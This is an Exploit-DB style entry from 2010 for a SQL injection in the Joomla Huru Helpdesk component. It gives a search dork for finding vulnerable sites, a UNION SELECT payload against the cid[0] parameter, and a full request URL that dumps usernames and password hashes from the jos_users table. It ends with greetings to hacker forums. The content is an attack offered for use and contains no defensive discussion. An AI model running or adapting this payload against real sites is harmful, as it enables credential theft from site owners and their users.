Joomla! Component Huru Helpdesk - SQL Injection (1)

EDB-ID:

12124

CVE:

N/A




Platform:

PHP

Date:

2010-04-09


# Exploit Title: joomla component huruhelpdesk SQL injection Vulnerability 
# Date: 09 april 2010
# Author: bumble_be
# Software Link: N/A
# Tested on: Windows XP 2

======================================================================
[x] author : bumble_be (iogi89@ymail.com)
[x] dork   : inurl:option=com_huruhelpdesk
[x] myweb  : http://linggau-haxor.com
======================================================================

==== SQLI EXPLOIT ====
/**/union/**/select/**/1,2,3,version@@,5,6,7--


==== VULN IN HERE ====

http://localhost/xampp/joomla/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1[c0de]



==== LIVE DEMO

http://localhost/xampp/joomla/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password),5,6,7+from+jos_users--


[x]-------------------------------------------------------------------

GREETZ TO WE FORUM:
DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID

[x]-------------------------------------------------------------------

MY BROTHA :
mywisdom, spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death,
eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker :)

[x]-------------------------------------------------------------------

note :mulailah sesuatu dengan ucapan bissmillah

[X]-------------------------------------------------------------------
INDONESIA STILL UP AND WE NOT DEAD :0